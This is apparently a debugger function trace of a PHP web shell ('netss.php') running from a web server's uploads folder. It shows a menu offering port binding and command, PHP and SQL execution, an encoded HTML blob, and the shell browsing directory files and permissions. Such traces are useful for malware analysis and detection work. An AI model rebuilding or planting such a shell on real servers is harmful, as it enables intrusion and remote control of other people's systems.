3 71 0 0.139087 971472 ini_set 0 /var/www/html/uploads/netss.php(1) : eval()'d code 5 2 'max_execution_time' 10000
3 71 1 0.139104 971608
3 71 R '30'
3 72 0 0.139117 971504 header 0 /var/www/html/uploads/netss.php(1) : eval()'d code 6 1 'content-Type: text/html; charset=UTF-8'
3 72 1 0.139134 971680
3 72 R NULL
3 73 0 0.139149 971648 strdir 1 /var/www/html/uploads/netss.php(1) : eval()'d code 18 1 '/var/www/html/uploads/netss.php'
4 74 0 0.139162 971648 chop 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 1 '/var/www/html/uploads/netss.php'
4 74 1 0.139176 971680
4 74 R '/var/www/html/uploads/netss.php'
4 75 0 0.139190 971648 str_replace 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/var/www/html/uploads/netss.php'
4 75 1 0.139212 971744
4 75 R '/var/www/html/uploads/netss.php'
3 73 1 0.139227 971648
3 73 R '/var/www/html/uploads/netss.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 18 $myfile = '/var/www/html/uploads/netss.php'
3 76 0 0.139253 971648 strpos 0 /var/www/html/uploads/netss.php(1) : eval()'d code 19 2 '/var/www/html/uploads/netss.php' 'eval()'
3 76 1 0.139268 971720
3 76 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 19 $myfile = '/var/www/html/uploads/netss.php'
3 77 0 0.139291 971648 dirname 0 /var/www/html/uploads/netss.php(1) : eval()'d code 20 1 '/var/www/html/uploads/netss.php'
3 77 1 0.139304 971736
3 77 R '/var/www/html/uploads'
3 78 0 0.139318 971696 strdir 1 /var/www/html/uploads/netss.php(1) : eval()'d code 20 1 '/var/www/html/uploads/'
4 79 0 0.139331 971696 chop 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 1 '/var/www/html/uploads/'
4 79 1 0.139344 971728
4 79 R '/var/www/html/uploads/'
4 80 0 0.139358 971696 str_replace 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/var/www/html/uploads/'
4 80 1 0.139379 971792
4 80 R '/var/www/html/uploads/'
3 78 1 0.139393 971696
3 78 R '/var/www/html/uploads/'
3 81 0 0.139406 971696 define 0 /var/www/html/uploads/netss.php(1) : eval()'d code 20 2 'THISDIR' '/var/www/html/uploads/'
3 81 1 0.139421 971800
3 81 R TRUE
3 82 0 0.139434 971728 strdir 1 /var/www/html/uploads/netss.php(1) : eval()'d code 21 1 '/uploads/netss.php'
4 83 0 0.139447 971728 chop 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 1 '/uploads/netss.php'
4 83 1 0.139460 971760
4 83 R '/uploads/netss.php'
4 84 0 0.139473 971728 str_replace 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/uploads/netss.php'
4 84 1 0.139493 971824
4 84 R '/uploads/netss.php'
3 82 1 0.139507 971728
3 82 R '/uploads/netss.php'
3 85 0 0.139520 972104 strtr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 21 2 '/var/www/html/uploads/netss.php' ['/uploads/netss.php' => '']
3 85 1 0.139550 972208
3 85 R '/var/www/html'
3 86 0 0.139564 971768 strdir 1 /var/www/html/uploads/netss.php(1) : eval()'d code 21 1 '/var/www/html/'
4 87 0 0.139577 971768 chop 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 1 '/var/www/html/'
4 87 1 0.139590 971800
4 87 R '/var/www/html/'
4 88 0 0.139603 971768 str_replace 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/var/www/html/'
4 88 1 0.139622 971864
4 88 R '/var/www/html/'
3 86 1 0.139636 971768
3 86 R '/var/www/html/'
3 89 0 0.139648 971768 define 0 /var/www/html/uploads/netss.php(1) : eval()'d code 21 2 'ROOTDIR' '/var/www/html/'
3 89 1 0.139663 971872
3 89 R TRUE
3 90 0 0.139676 971800 getinfo 1 /var/www/html/uploads/netss.php(1) : eval()'d code 22 0
4 91 0 0.139690 972200 function_exists 0 /var/www/html/uploads/netss.php(1) : eval()'d code 378 1 'phpinfo'
4 91 1 0.139704 972240
4 91 R TRUE
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 378 $infos = [0 => NULL, 1 => NULL, 2 => TRUE, 3 => '127.0.0.1']
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 391 $html = 'WUIvMzptCFNvKTf3A1keAmqpnmp3KTflpykeAmEpnmL4KTf2BIkeAmApnmL0KTf2p1keAaApnmplKTflpykeAwApnmMmKTf2pFV7WUElMlN9VPWpnmWmKTf2Z1keAaApnmMmKTf2pSkeZaApnmp1KTf3ZSkeAwEpnmLkKTf3ASkeAwIpnmWlKTf3ZSkeAwupnmpjKTfmp1keAwqpnmAkVwfxqUWaVP49VT92LGW1pzfbWS9THxIWHxIoW1IUE0AsIHWTElqqXF4vKTflAykeAmApnmAkVv5iqzRlqKWeXPEsEyWSFIWSJlqQIHAsEyWMHlqqXF4vKTflAykeAmOpnmAkVv4xozIyozj7WUShM24tCFNvKTf0A1keAQIpnmH0KTflZPVhWUElMl4vKTflZSkeAQupnmH0KTf1ASkeAGOpnmWmKTfmZIkeZaWpnmZkKTIpLIkeAQupnmMmKTf3Z1keAmEpnmAhVv4xqJWzMl4vKTIpLIkeAQApnmMmKTf2'
3 90 1 0.139768 971824
3 90 R TRUE
3 92 0 0.139782 971824 define 0 /var/www/html/uploads/netss.php(1) : eval()'d code 22 2 'EXISTS_PHPINFO' TRUE
3 92 1 0.139797 971928
3 92 R TRUE
3 93 0 0.139809 971856 get_magic_quotes_gpc 0 /var/www/html/uploads/netss.php(1) : eval()'d code 23 0
3 93 1 0.139822 971856
3 93 R FALSE
3 94 0 0.139835 971856 function_exists 0 /var/www/html/uploads/netss.php(1) : eval()'d code 26 1 'mysql_close'
3 94 1 0.139849 971896
3 94 R FALSE
3 95 0 0.139861 971856 function_exists 0 /var/www/html/uploads/netss.php(1) : eval()'d code 29 1 'mssql_close'
3 95 1 0.139874 971896
3 95 R FALSE
3 96 0 0.139887 971856 function_exists 0 /var/www/html/uploads/netss.php(1) : eval()'d code 32 1 'oci_close'
3 96 1 0.139900 971896
3 96 R FALSE
3 97 0 0.139912 971856 function_exists 0 /var/www/html/uploads/netss.php(1) : eval()'d code 35 1 'sybase_close'
3 97 1 0.139926 971896
3 97 R FALSE
3 98 0 0.139939 971856 function_exists 0 /var/www/html/uploads/netss.php(1) : eval()'d code 38 1 'pg_close'
3 98 1 0.139951 971896
3 98 R FALSE
3 99 0 0.139964 971856 substr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 41 3 'Linux' 0 3
3 99 1 0.139978 971984
3 99 R 'Lin'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 41 $win = FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 42 $msg = '=======ND4SMU======='
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 421 $sitename = 'localhost'
3 100 0 0.140031 971912 get_current_user 0 /var/www/html/uploads/netss.php(1) : eval()'d code 425 0
3 100 1 0.140068 971952
3 100 R 'osboxes'
3 101 0 0.140084 971944 getmyuid 0 /var/www/html/uploads/netss.php(1) : eval()'d code 425 0
3 101 1 0.140097 971944
3 101 R 1000
3 102 0 0.140110 971944 getmygid 0 /var/www/html/uploads/netss.php(1) : eval()'d code 425 0
3 102 1 0.140122 971944
3 102 R 1000
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 431 $menu = ['file' => 'File Mgr', 'scan' => 'Searcher', 'antivirus' => 'Antivirus', 'backshell' => 'Bind Port', 'exec' => 'Exec CMD', 'phpeval' => 'Exec PHP', 'sql' => 'Exec SQL', 'info' => 'System']
3 103 0 0.140160 971864 array_key_exists 0 /var/www/html/uploads/netss.php(1) : eval()'d code 432 2 NULL ['file' => 'File Mgr', 'scan' => 'Searcher', 'antivirus' => 'Antivirus', 'backshell' => 'Bind Port', 'exec' => 'Exec CMD', 'phpeval' => 'Exec PHP', 'sql' => 'Exec SQL', 'info' => 'System']
3 103 1 0.140184 971928
3 103 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 432 $go = 'file'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 433 $nowdir = '/var/www/html/uploads/'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 435 $key = 'file'
3 104 0 0.140232 971960 base64_encode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 436 1 '/var/www/html/uploads/'
3 104 1 0.140246 972056
3 104 R 'L3Zhci93d3cvaHRtbC91cGxvYWRzLw=='
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 435 $key = 'scan'
3 105 0 0.140274 971944 base64_encode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 436 1 '/var/www/html/uploads/'
3 105 1 0.140287 972040
3 105 R 'L3Zhci93d3cvaHRtbC91cGxvYWRzLw=='
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 435 $key = 'antivirus'
3 106 0 0.140314 971944 base64_encode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 436 1 '/var/www/html/uploads/'
3 106 1 0.140327 972040
3 106 R 'L3Zhci93d3cvaHRtbC91cGxvYWRzLw=='
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 435 $key = 'backshell'
3 107 0 0.140353 971944 base64_encode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 436 1 '/var/www/html/uploads/'
3 107 1 0.140366 972040
3 107 R 'L3Zhci93d3cvaHRtbC91cGxvYWRzLw=='
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 435 $key = 'exec'
3 108 0 0.140396 971944 base64_encode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 436 1 '/var/www/html/uploads/'
3 108 1 0.140409 972040
3 108 R 'L3Zhci93d3cvaHRtbC91cGxvYWRzLw=='
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 435 $key = 'phpeval'
3 109 0 0.140435 971944 base64_encode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 436 1 '/var/www/html/uploads/'
3 109 1 0.140448 972040
3 109 R 'L3Zhci93d3cvaHRtbC91cGxvYWRzLw=='
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 435 $key = 'sql'
3 110 0 0.140479 971912 base64_encode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 436 1 '/var/www/html/uploads/'
3 110 1 0.140492 972008
3 110 R 'L3Zhci93d3cvaHRtbC91cGxvYWRzLw=='
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 435 $key = 'info'
3 111 0 0.140519 971912 base64_encode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 436 1 '/var/www/html/uploads/'
3 111 1 0.140532 972008
3 111 R 'L3Zhci93d3cvaHRtbC91cGxvYWRzLw=='
3 112 0 0.140548 971832 subeval 1 /var/www/html/uploads/netss.php(1) : eval()'d code 440 0
3 112 1 0.140561 971832
3 113 0 0.140572 971832 fileperms 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1021 1 '/var/www/html/uploads/'
3 113 1 0.140588 971896
3 113 R 16895
3 114 0 0.140601 971856 decoct 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1021 1 16895
3 114 1 0.140615 971928
3 114 R '40777'
3 115 0 0.140627 971888 substr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1021 2 '40777' -4
3 115 1 0.140641 971984
3 115 R '0777'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1021 $chmod = '0777'
3 116 0 0.140665 971888 showdir 1 /var/www/html/uploads/netss.php(1) : eval()'d code 1025 1 '/var/www/html/uploads/'
4 117 0 0.140678 971936 strdir 1 /var/www/html/uploads/netss.php(1) : eval()'d code 83 1 '/var/www/html/uploads//'
5 118 0 0.140692 971936 chop 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 1 '/var/www/html/uploads//'
5 118 1 0.140705 971968
5 118 R '/var/www/html/uploads//'
5 119 0 0.140719 971936 str_replace 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/var/www/html/uploads//'
5 119 1 0.140740 972080
5 119 R '/var/www/html/uploads/'
4 117 1 0.140755 971984
4 117 R '/var/www/html/uploads/'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 83 $dir = '/var/www/html/uploads/'
4 120 0 0.140780 971936 opendir 0 /var/www/html/uploads/netss.php(1) : eval()'d code 84 1 '/var/www/html/uploads/'
4 120 1 0.140798 972216
4 120 R resource(7) of type (stream)
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 84 $handle = resource(7) of type (stream)
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 88 $array = []
4 121 0 0.140836 972184 readdir 0 /var/www/html/uploads/netss.php(1) : eval()'d code 89 1 resource(7) of type (stream)
4 121 1 0.140857 972264
4 121 R 'auth_log.php'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 89 $name = 'auth_log.php'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 93 $path = '/var/www/html/uploads/auth_log.php'
4 122 0 0.140898 972288 strtr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 94 2 'auth_log.php' ['\'' => '%27', '"' => '%22']
4 122 1 0.140934 972352
4 122 R 'auth_log.php'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 94 $name = 'auth_log.php'
4 123 0 0.140959 972288 is_dir 0 /var/www/html/uploads/netss.php(1) : eval()'d code 95 1 '/var/www/html/uploads/auth_log.php'
4 123 1 0.140976 972344
4 123 R FALSE
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 98 $array['file']['/var/www/html/uploads/auth_log.php'] = 'auth_log.php'
4 124 0 0.141005 973056 readdir 0 /var/www/html/uploads/netss.php(1) : eval()'d code 89 1 resource(7) of type (stream)
4 124 1 0.141019 973128
4 124 R '..'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 89 $name = '..'
4 125 0 0.141043 973088 readdir 0 /var/www/html/uploads/netss.php(1) : eval()'d code 89 1 resource(7) of type (stream)
4 125 1 0.141056 973160
4 125 R '.'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 89 $name = '.'
4 126 0 0.141084 973088 readdir 0 /var/www/html/uploads/netss.php(1) : eval()'d code 89 1 resource(7) of type (stream)
4 126 1 0.141097 973168
4 126 R 'prepend.php'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 89 $name = 'prepend.php'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 93 $path = '/var/www/html/uploads/prepend.php'
4 127 0 0.141132 973160 strtr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 94 2 'prepend.php' ['\'' => '%27', '"' => '%22']
4 127 1 0.141148 973224
4 127 R 'prepend.php'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 94 $name = 'prepend.php'
4 128 0 0.141172 973160 is_dir 0 /var/www/html/uploads/netss.php(1) : eval()'d code 95 1 '/var/www/html/uploads/prepend.php'
4 128 1 0.141188 973200
4 128 R FALSE
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 98 $array['file']['/var/www/html/uploads/prepend.php'] = 'prepend.php'
4 129 0 0.141215 973160 readdir 0 /var/www/html/uploads/netss.php(1) : eval()'d code 89 1 resource(7) of type (stream)
4 129 1 0.141228 973232
4 129 R 'data'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 89 $name = 'data'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 93 $path = '/var/www/html/uploads/data'
4 130 0 0.141263 973248 strtr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 94 2 'data' ['\'' => '%27', '"' => '%22']
4 130 1 0.141279 973312
4 130 R 'data'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 94 $name = 'data'
4 131 0 0.141301 973248 is_dir 0 /var/www/html/uploads/netss.php(1) : eval()'d code 95 1 '/var/www/html/uploads/data'
4 131 1 0.141317 973280
4 131 R TRUE
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 96 $array['dir']['/var/www/html/uploads/data'] = 'data'
4 132 0 0.141343 973616 readdir 0 /var/www/html/uploads/netss.php(1) : eval()'d code 89 1 resource(7) of type (stream)
4 132 1 0.141356 973696
4 132 R 'netss.php'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 89 $name = 'netss.php'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 93 $path = '/var/www/html/uploads/netss.php'
4 133 0 0.141391 973712 strtr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 94 2 'netss.php' ['\'' => '%27', '"' => '%22']
4 133 1 0.141406 973776
4 133 R 'netss.php'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 94 $name = 'netss.php'
4 134 0 0.141430 973712 is_dir 0 /var/www/html/uploads/netss.php(1) : eval()'d code 95 1 '/var/www/html/uploads/netss.php'
4 134 1 0.141445 973752
4 134 R FALSE
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 98 $array['file']['/var/www/html/uploads/netss.php'] = 'netss.php'
4 135 0 0.141471 973712 readdir 0 /var/www/html/uploads/netss.php(1) : eval()'d code 89 1 resource(7) of type (stream)
4 135 1 0.141485 973792
4 135 R '.htaccess'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 89 $name = '.htaccess'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 93 $path = '/var/www/html/uploads/.htaccess'
4 136 0 0.141519 973808 strtr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 94 2 '.htaccess' ['\'' => '%27', '"' => '%22']
4 136 1 0.141535 973872
4 136 R '.htaccess'
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 94 $name = '.htaccess'
4 137 0 0.141558 973808 is_dir 0 /var/www/html/uploads/netss.php(1) : eval()'d code 95 1 '/var/www/html/uploads/.htaccess'
4 137 1 0.141574 973848
4 137 R FALSE
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 98 $array['file']['/var/www/html/uploads/.htaccess'] = '.htaccess'
4 138 0 0.141600 973808 readdir 0 /var/www/html/uploads/netss.php(1) : eval()'d code 89 1 resource(7) of type (stream)
4 138 1 0.141614 973848
4 138 R FALSE
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 89 $name = FALSE
4 139 0 0.141637 973808 closedir 0 /var/www/html/uploads/netss.php(1) : eval()'d code 101 1 resource(7) of type (stream)
4 139 1 0.141653 973624
4 139 R NULL
3 116 1 0.141667 973512
3 116 R ['file' => ['/var/www/html/uploads/auth_log.php' => 'auth_log.php', '/var/www/html/uploads/prepend.php' => 'prepend.php', '/var/www/html/uploads/netss.php' => 'netss.php', '/var/www/html/uploads/.htaccess' => '.htaccess'], 'dir' => ['/var/www/html/uploads/data' => 'data']]
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1025 $array = ['file' => ['/var/www/html/uploads/auth_log.php' => 'auth_log.php', '/var/www/html/uploads/prepend.php' => 'prepend.php', '/var/www/html/uploads/netss.php' => 'netss.php', '/var/www/html/uploads/.htaccess' => '.htaccess'], 'dir' => ['/var/www/html/uploads/data' => 'data']]
3 140 0 0.141716 973888 strtr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1026 2 '/var/www/html/uploads/' ['/var/www/html/' => '']
3 140 1 0.141731 973992
3 140 R 'uploads/'
3 141 0 0.141745 973552 strdir 1 /var/www/html/uploads/netss.php(1) : eval()'d code 1026 1 '/uploads//'
4 142 0 0.141758 973552 chop 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 1 '/uploads//'
4 142 1 0.141772 973584
4 142 R '/uploads//'
4 143 0 0.141785 973552 str_replace 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/uploads//'
4 143 1 0.141805 973688
4 143 R '/uploads/'
3 141 1 0.141819 973592
3 141 R '/uploads/'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1026 $thisurl = '/uploads/'
3 144 0 0.141844 973552 strtr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1027 2 '/var/www/html/uploads/' ['\'' => '%27', '"' => '%22']
3 144 1 0.141860 973616
3 144 R '/var/www/html/uploads/'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1027 $nowdir = '/var/www/html/uploads/'
3 145 0 0.141887 973552 subeval 1 /var/www/html/uploads/netss.php(1) : eval()'d code 1030 0
3 145 1 0.141901 973552
3 146 0 0.141908 973552 is_writable 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1031 1 '/var/www/html/uploads/'
3 146 1 0.141927 973592
3 146 R TRUE
3 147 0 0.141941 973712 strdir 1 /var/www/html/uploads/netss.php(1) : eval()'d code 1031 1 '/var/www/html/uploads//'
4 148 0 0.141954 973712 chop 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 1 '/var/www/html/uploads//'
4 148 1 0.141967 973744
4 148 R '/var/www/html/uploads//'
4 149 0 0.141981 973712 str_replace 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/var/www/html/uploads//'
4 149 1 0.142001 973856
4 149 R '/var/www/html/uploads/'
3 147 1 0.142016 973760
3 147 R '/var/www/html/uploads/'
3 150 0 0.142033 973552 subeval 1 /var/www/html/uploads/netss.php(1) : eval()'d code 1053 0
3 150 1 0.142047 973552
3 151 0 0.142054 973552 subeval 1 /var/www/html/uploads/netss.php(1) : eval()'d code 1060 0
3 151 1 0.142067 973552
3 152 0 0.142074 973552 dirname 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1064 1 '/var/www/html/uploads/'
3 152 1 0.142088 973632
3 152 R '/var/www/html'
3 153 0 0.142102 973576 asort 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1066 1 ['/var/www/html/uploads/data' => 'data']
3 153 1 0.142118 973608
3 153 R TRUE
3 154 0 0.142131 973600 asort 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1067 1 ['/var/www/html/uploads/auth_log.php' => 'auth_log.php', '/var/www/html/uploads/prepend.php' => 'prepend.php', '/var/www/html/uploads/netss.php' => 'netss.php', '/var/www/html/uploads/.htaccess' => '.htaccess']
3 154 1 0.142151 973632
3 154 R TRUE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1068 $fnum = 0
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1068 $dnum = 0
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1069 $path = '/var/www/html/uploads/data'
3 155 0 0.142196 973576 fileperms 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1070 1 '/var/www/html/uploads/data'
3 155 1 0.142212 973616
3 155 R 16895
3 156 0 0.142225 973576 decoct 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1070 1 16895
3 156 1 0.142237 973648
3 156 R '40777'
3 157 0 0.142250 973608 substr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1070 2 '40777' -4
3 157 1 0.142264 973704
3 157 R '0777'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1070 $prem = '0777'
3 158 0 0.142288 973608 filectime 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1071 1 '/var/www/html/uploads/data'
3 158 1 0.142301 973648
3 158 R 1676241948
3 159 0 0.142314 973608 date 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1071 2 'Y-m-d H:i:s' 1676241948
3 159 1 0.142373 976000
3 159 R '2023-02-12 17:45:48'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1071 $ctime = '2023-02-12 17:45:48'
3 160 0 0.142403 975928 filemtime 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1072 1 '/var/www/html/uploads/data'
3 160 1 0.142421 975968
3 160 R 1676241948
3 161 0 0.142435 975928 date 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1072 2 'Y-m-d H:i:s' 1676241948
3 161 1 0.142466 976256
3 161 R '2023-02-12 17:45:48'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1072 $mtime = '2023-02-12 17:45:48'
3 162 0 0.142492 976296 strtr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1074 2 'data' ['%27' => '\'', '%22' => '"']
3 162 1 0.142508 976360
3 162 R 'data'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1082 $dnum++
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1084 $path = '/var/www/html/uploads/.htaccess'
3 163 0 0.142546 976160 fileperms 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1085 1 '/var/www/html/uploads/.htaccess'
3 163 1 0.142562 976200
3 163 R 33188
3 164 0 0.142575 976160 decoct 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1085 1 33188
3 164 1 0.142588 976232
3 164 R '100644'
3 165 0 0.142601 976192 substr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1085 2 '100644' -4
3 165 1 0.142614 976288
3 165 R '0644'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1085 $prem = '0644'
3 166 0 0.142644 976160 filectime 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1086 1 '/var/www/html/uploads/.htaccess'
3 166 1 0.142657 976200
3 166 R 1676241948
3 167 0 0.142670 976160 date 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1086 2 'Y-m-d H:i:s' 1676241948
3 167 1 0.142701 976488
3 167 R '2023-02-12 17:45:48'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1086 $ctime = '2023-02-12 17:45:48'
3 168 0 0.142727 976160 filemtime 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1087 1 '/var/www/html/uploads/.htaccess'
3 168 1 0.142741 976200
3 168 R 1676241948
3 169 0 0.142754 976160 date 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1087 2 'Y-m-d H:i:s' 1676241948
3 169 1 0.142784 976488
3 169 R '2023-02-12 17:45:48'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1087 $mtime = '2023-02-12 17:45:48'
3 170 0 0.142809 976160 filesize 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1088 1 '/var/www/html/uploads/.htaccess'
3 170 1 0.142823 976200
3 170 R 64
3 171 0 0.142836 976160 size 1 /var/www/html/uploads/netss.php(1) : eval()'d code 1088 1 64
3 171 1 0.142849 976192
3 171 R '64 B'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1088 $size = '64 B'
3 172 0 0.142874 976352 strtr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1090 2 '.htaccess' ['%27' => '\'', '%22' => '"']
3 172 1 0.142890 976416
3 172 R '.htaccess'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1098 $fnum++
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1084 $path = '/var/www/html/uploads/auth_log.php'
3 173 0 0.142929 976192 fileperms 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1085 1 '/var/www/html/uploads/auth_log.php'
3 173 1 0.142946 976240
3 173 R 33188
3 174 0 0.142958 976200 decoct 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1085 1 33188
3 174 1 0.142971 976272
3 174 R '100644'
3 175 0 0.142984 976232 substr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1085 2 '100644' -4
3 175 1 0.142997 976328
3 175 R '0644'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1085 $prem = '0644'
3 176 0 0.143021 976200 filectime 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1086 1 '/var/www/html/uploads/auth_log.php'
3 176 1 0.143035 976240
3 176 R 1676241948
3 177 0 0.143047 976200 date 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1086 2 'Y-m-d H:i:s' 1676241948
3 177 1 0.143078 976528
3 177 R '2023-02-12 17:45:48'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1086 $ctime = '2023-02-12 17:45:48'
3 178 0 0.143103 976200 filemtime 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1087 1 '/var/www/html/uploads/auth_log.php'
3 178 1 0.143117 976240
3 178 R 1676241948
3 179 0 0.143130 976200 date 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1087 2 'Y-m-d H:i:s' 1676241948
3 179 1 0.143165 976528
3 179 R '2023-02-12 17:45:48'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1087 $mtime = '2023-02-12 17:45:48'
3 180 0 0.143190 976200 filesize 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1088 1 '/var/www/html/uploads/auth_log.php'
3 180 1 0.143205 976240
3 180 R 227
3 181 0 0.143218 976200 size 1 /var/www/html/uploads/netss.php(1) : eval()'d code 1088 1 227
3 181 1 0.143231 976232
3 181 R '227 B'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1088 $size = '227 B'
3 182 0 0.143255 976360 strtr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1090 2 'auth_log.php' ['%27' => '\'', '%22' => '"']
3 182 1 0.143272 976424
3 182 R 'auth_log.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1098 $fnum++
